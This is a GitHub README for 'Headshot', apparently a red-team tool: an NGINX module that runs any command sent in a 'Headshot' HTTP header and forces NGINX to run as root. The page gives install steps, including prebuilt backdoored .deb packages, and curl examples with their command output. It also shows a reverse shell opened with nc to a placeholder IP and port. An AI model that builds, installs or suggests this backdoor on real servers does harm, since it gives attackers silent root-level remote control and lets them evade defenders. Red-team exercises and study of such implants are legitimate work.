Skip to content

NGINX module to allow for RCE through a specific header

License

Notifications You must be signed in to change notification settings

RITRedteam/Headshot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

49 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Headshot

NGINX module to allow for RCE through a specific header. Also forces NGINX to run as root.

Installation

There is a install script provided in the repo. It will pull down NGINX and compile it with the module. Then NGINX directory will be setup in /usr/local/nginx (NGINX default). After this the NGX_HTTP_CONTENT_PHASE is hooked and the module will be running in NGINX. In addition, the deb files provided can be used to install the exploited NGINX by running the following:

dpkg -i deb/*.deb

In the event of compiling from source this webpage maybe helpfule for the configure portion of install.sh.

Usage

To use the Headshot simply supply your command as a value to the Headshot HTTP header. The output (stdout or stderr) of your command will be the response body of the command run. If there is no stdout or stderr from the command, then the response body will obviously be empty and a helpful string is returned. An example or two is shown below.

[root@localhost Headshot]# curl localhost --header "Headshot: ls -la /tmp"
total 4
drwxrwxrwt.  8 root root 123 Nov 30 11:39 .
dr-xr-xr-x. 17 root root 224 Oct 30 14:11 ..
drwxrwxrwt.  2 root root  19 Nov 29 22:23 .ICE-unix
drwxrwxrwt.  2 root root   6 Oct 30 14:09 .Test-unix
-r--r--r--.  1 root root  11 Nov 29 22:23 .X0-lock
drwxrwxrwt.  2 root root  16 Nov 29 22:23 .X11-unix
drwxrwxrwt.  2 root root   6 Oct 30 14:09 .XIM-unix
drwx------.  2 root root  20 Nov 29 22:24 .esd-0
drwxrwxrwt.  2 root root   6 Oct 30 14:09 .font-unix
[root@localhost Headshot]# curl localhost --header "Headshot: touch /tmp/hello"
<-- no stderr/stdout from your command -->
[root@localhost Headshot]# curl localhost --header "Headshot: ls -la /tmp"
total 4
drwxrwxrwt.  8 root   root   136 Nov 30 11:39 .
dr-xr-xr-x. 17 root   root   224 Oct 30 14:11 ..
drwxrwxrwt.  2 root   root    19 Nov 29 22:23 .ICE-unix
drwxrwxrwt.  2 root   root     6 Oct 30 14:09 .Test-unix
-r--r--r--.  1 root   root    11 Nov 29 22:23 .X0-lock
drwxrwxrwt.  2 root   root    16 Nov 29 22:23 .X11-unix
drwxrwxrwt.  2 root   root     6 Oct 30 14:09 .XIM-unix
drwx------.  2 root   root    20 Nov 29 22:24 .esd-0
drwxrwxrwt.  2 root   root     6 Oct 30 14:09 .font-unix
-rw-rw-rw-.  1 nobody nobody   0 Nov 30 11:39 hello
[root@localhost Headshot]# curl localhost --header "Headshot: not_a_command"
sh: 1: not_a_command: not found

If the header is not supplied then the server will respond to requests as normal. See below for example.

[root@localhost Headshot]# curl localhost
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

For those curious, if one were to setup a reverse shell from this exploit and a blue team member ran ps -fax then they would see something like the following output while the shell was active.

 17622 ?        Ss     0:00  \_ nginx: master process /usr/local/nginx/sbin/nginx
 17623 ?        S      0:00      \_ nginx: worker process
 17719 ?        S      0:00          \_ sh -c nc -c /bin/bash {YOUR_IP} {YOUR_PORT} 2>&1
 17720 ?        S      0:00              \_ sh -c /bin/bash
 17721 ?        S      0:00                  \_ /bin/bash

Resources

The foremost resource on NGINX Modules

A basic hello world module

The NGINX Source begins to be helpful after you loose sanity

The NGINX API Documentation also helps

Also not a bad small guide From the same source as above but goes over NGINX Phases

This would be the guide to follow to dynamically link the module

This is where I go the idea to hook the NGX_HTTP_CONTENT_PHASE to avoid directive use

About

NGINX module to allow for RCE through a specific header

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published